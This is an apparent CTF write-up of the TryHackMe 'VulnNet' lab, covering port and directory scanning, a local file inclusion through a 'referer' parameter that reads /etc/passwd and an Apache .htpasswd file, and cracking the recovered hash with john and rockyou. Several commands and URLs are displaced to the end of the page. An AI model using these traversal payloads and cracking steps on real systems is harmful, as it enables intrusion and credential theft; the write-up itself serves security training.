📕
writeups
  • Introduction
  • Try Hack Me
    • Walkthroughs
      • Core Windows Processes
      • Linux: Local Enumeration
      • Network services
      • Network services 2
      • What the Shell?
      • Common Linux Privesc
      • Hashing - Crypto 101
    • Challanges (CTF)
      • Basic pentesting
      • tomghost
      • VulnNet
  • hack the box
    • Easy machines
    • Medium machines
Powered by GitBook
On this page
  • Enumeration
  • Exploitation:

Was this helpful?

  1. Try Hack Me
  2. Challanges (CTF)

VulnNet

Can you take advantage of the misconfigurations made by VulnNet Entertainment?

Enumeration

1) masscan: masscan -e eth0 -p 1-65535 --rate=10000 10.10.186.105

Discovered open port 22/tcp on 10.10.186.105                                   
Discovered open port 80/tcp on 10.10.186.105

2) nmap: nmap -sV -sC -p 22,80 -v 10.10.186.105

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet

3) gobuster:

Starting gobuster
===============================================================
/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

4) found a login page :

+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /LICENSE.txt, fields: 0x455 0x5b995f090f3a1 
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.

6) LICENSE.txt shows zlib version. But this is not vulnerable

7) /js directory shows .js files

  • git clone [linkfinder]

  • pip3 install -r requirement.txt

http://vulnnet.thm/index.php?referer=
http://broadcast.vulnnet.thm

9) I need to add http://broadcast.vulnnet.thm in /etc/hosts, then it shows:

11) Searching for password in common file:

developers:$apr1$ntOz2ERF$..................

Exploitation:

12) Cracking hash: john hash --wordlist=/usr/share/wordlists/rockyou.txt

13) Using these credential, I can log in broadcast

PrevioustomghostNextEasy machines

Last updated 4 years ago

Was this helpful?

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

5) nikto scan: nikto -h

8) I need to use

Search link: ./linkfinder.py -i -o cli

10) There is LFI: curl

curl

14) Site running Clip Bucket 4.0. There is an exploit for this:

http://vulnnet.thm
http://vulnnet.thm
linkfinder
http://vulnnet.thm/js/index__d8338055.js
http://vulnnet.thm/index.php?referer=..//..//..//..//..//..//etc/passwd
http://vulnnet.thm/index.php?referer=..//..//..//..//..//..//etc/apache2/.htpasswd
Exploit DB